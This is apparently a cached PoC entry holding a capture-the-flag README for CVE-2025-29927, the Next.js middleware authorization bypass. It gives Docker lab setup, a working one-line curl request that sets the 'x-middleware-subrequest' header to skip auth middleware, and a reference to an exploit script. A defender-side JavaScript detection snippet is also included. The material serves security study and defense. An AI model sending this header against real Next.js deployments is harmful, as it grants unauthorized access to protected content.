PoC details: 5fc47cddf1f9b5abd276fd539b4ebaed792eb653

Source
Related vulnerability
Title: Next.js security vulnerability (CVE-2025-29927)
Description: Next.js is an open-source React framework from Vercel. Next.js versions before 14.2.25 and before 15.2.3 contain a security vulnerability: when authorization checks are performed in middleware, those checks can be bypassed.
Introduction
# CVE-2025-29927 - Next.js Middleware Authorization Bypass (PoC)

This is a **Capture The Flag (CTF)** styled Proof of Concept for the **Next.js Middleware Authorization Bypass** vulnerability (**CVE-2025-29927**). The goal is to bypass the auth middleware and retrieve the flag from the `/protected` route.

---

## Vulnerability Summary

- **CVE**: CVE-2025-29927  
- **Type**: Authorization Bypass  
- **Component**: Next.js Middleware  
- **Impact**: Unauthorized access to protected routes  
- **PoC Target Route**: `/protected`  
- **Expected Behavior**: Unauthorized users are redirected to `/`  
- **Vulnerable Behavior**: Using a crafted request allows bypassing the redirect and accessing the protected content directly

---

## PoC Setup

### 1. Clone the Repository

```bash
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker
```

---

### 2. Build and Run the Vulnerable App

```bash
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app
```

This starts the vulnerable Next.js app on **http://IP:3000** (replace `IP` with the address of the Docker host).

---

## Exploitation

### 1. Without Exploit

Try accessing:

```bash
curl -i http://IP:3000/protected
```

You will be redirected to `/`.

The same request sent with the `x-middleware-subrequest` header that this PoC relies on is served without the redirect:

```bash
curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected
```

### 2. With Exploit

Use the provided `exploit.py` to bypass the middleware and access the protected route:

```bash
python3 exploit.py -url http://IP:3000
```

If successful, you will retrieve the flag from `/protected`.
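As an added defender-side example (not code from the PoC repository or from Next.js itself), the following checks flag the two conditions this PoC depends on: a Next.js version older than the fixed releases named above, and an inbound request carrying the `x-middleware-subrequest` header, which an external client has no legitimate reason to send. The function names and the sample requests are constructed for this illustration.

```javascript
// Header the PoC sends; external clients never need it, so its presence at the
// edge (reverse proxy, WAF, access-log review) is a strong signal.
const VULN_HEADER = "x-middleware-subrequest";

// Fixed releases named in the advisory text above, keyed by major version.
const FIXED = { 14: [14, 2, 25], 15: [15, 2, 3] };

function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(v.trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

function cmp(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] - b[i];
  return 0;
}

// true  -> older than the fixed release for its major (vulnerable)
// false -> at or past the fixed release
// null  -> a major this page gives no threshold for; treat as unknown
function isVulnerableNextVersion(version) {
  const parsed = parseVersion(version);
  const fixed = FIXED[parsed[0]];
  if (!fixed) return null;
  return cmp(parsed, fixed) < 0;
}

// Edge-style check: match the header name case-insensitively (HTTP header
// names are not case-sensitive) and recommend stripping it before the request
// reaches the application, while logging the hit for investigation.
function inspectRequest(req) {
  const hit = Object.keys(req.headers).find(
    (h) => h.toLowerCase() === VULN_HEADER
  );
  if (!hit) return { suspicious: false, action: "allow" };
  return {
    suspicious: true,
    action: "strip-and-log",
    detail: `${req.method} ${req.path} carried ${hit}: ${req.headers[hit]}`,
  };
}

// Constructed sample requests mirroring the two curl commands above.
const SAMPLE_REQUESTS = [
  { method: "GET", path: "/protected", headers: { host: "app:3000" } },
  { method: "GET", path: "/protected",
    headers: { host: "app:3000", "X-Middleware-Subrequest": "middleware" } },
];
```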

---

## Files

- `Dockerfile` - Builds the vulnerable Next.js application
- `exploit.py` - Exploits the vulnerability to bypass auth
- `pages/` - Contains the vulnerable `/protected` and `/login` routes
- `middleware.js` - The vulnerable middleware logic
- `README.md` - This file

---

## Disclaimer

This PoC is for **educational and research purposes only**. Do not use it against systems you do not own or have explicit permission to test.

---

## 🏁 Flag

Find the flag by exploiting the vulnerability and accessing:

```
http://IP:3000/protected
```

Good luck! 🏴‍☠️
File snapshot
 [4.0K]  /data/pocs/5fc47cddf1f9b5abd276fd539b4ebaed792eb653
├── [1.9K]  exploit.py
├── [4.0K]  nextjs-docker
│   ├── [ 404]  Dockerfile
│   ├── [ 417]  middleware.js
│   ├── [ 271]  package.json
│   └── [4.0K]  pages
│       ├── [4.0K]  api
│       │   └── [ 478]  login.js
│       ├── [ 667]  index.js
│       ├── [1.8K]  login.js
│       └── [ 530]  protected.js
└── [2.1K]  README.md

3 directories, 9 files
The Shenlong bot has cached this for you.
Notes
    1. Accessing the original source is recommended.
    2. If the source is no longer available or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.